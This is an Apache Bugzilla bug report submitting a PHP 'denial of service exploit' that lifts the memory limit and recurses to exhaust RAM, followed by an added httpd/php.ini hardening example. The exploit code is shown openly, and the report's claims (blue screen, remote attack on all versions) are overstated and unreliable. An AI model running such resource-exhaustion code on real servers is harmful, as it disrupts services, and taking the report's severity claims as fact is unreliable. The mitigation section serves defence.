https://bz.apache.org/bugzilla/show_bug.cgi?id=64002

            Bug ID: 64002
           Summary: Apache2 HTTP PHP Denial Of Service
           Product: Apache httpd-2
           Version: 2.5-HEAD
          Hardware: All
                OS: All
            Status: NEW
          Severity: normal
          Priority: P2
         Component: All
          Assignee: [email protected]
          Reporter: [email protected]
  Target Milestone: ---

> [Suggested description]
> # Exploit Name : Apache2 HTTP DoS
> # Exploit Date : 13-12-2019
> # Exploit Author : Ali Can Gonullu
> 
> # Exploit :
> 
> <?php
> $sayi = 10;
> ini_set("memory_limit","-1"); //Unlimited Memory
> function islem($n) {
>     if ($n === 0) {
>         return 1;
>     } else {
>         $hesap += $n*islem($n-1)-$n*islem($n-2)+$n*islem($n-3);
>         echo $hesap;
>     }
> }
> islem($sayi);
> ?>
> 
> ------------------------------------------
> 
> [Additional Information]
> This vulnerability inflates RAM to give the computer a blue screen.
> With this vulnerability, servers can be shut down.
> The ini_set function is turned on in the original Apache PHP version.
> Apache Solution: Blocking ini_set
> 
> ------------------------------------------
> 
> [VulnerabilityType Other]
> Apache2 HTTP PHP Denial Of Service
> 
> ------------------------------------------
> 
> [Vendor of Product]
> Apache
> 
> ------------------------------------------
> 
> [Affected Product Code Base]
> Apache2 HTTP - All
> 
> ------------------------------------------
> 
> [Affected Component]
> Affected source code
> 
> ------------------------------------------
> 
> [Attack Type]
> Remote
> 
> ------------------------------------------
> 
> [Impact Denial of Service]
> true
> 
> ------------------------------------------
> 
> [Attack Vectors]
> Open PHP file (in this code)
> 
> ------------------------------------------
> 
> [Discoverer]
> Ali Can Gonullu
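
The mitigation the report proposes ("Blocking ini_set"), shown as an added configuration example that is not part of the report or of the httpd project. It assumes PHP is loaded into httpd as mod_php; the directory path is a placeholder.

```apache
# Constructed example; /var/www/app is a placeholder path.
<Directory "/var/www/app">
    # Weak: a value set with php_value can still be changed at runtime,
    # so ini_set("memory_limit", "-1") in a script lifts the cap.
    # php_value memory_limit 128M

    # Hardened: a directive set with php_admin_value cannot be overridden
    # by .htaccess or by ini_set(), so the cap holds for every script
    # served from this directory.
    php_admin_value memory_limit 128M
</Directory>

# Disabling the function outright is done in php.ini, not in httpd
# configuration, because disable_functions is a php.ini-only setting:
#   disable_functions = ini_set
```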
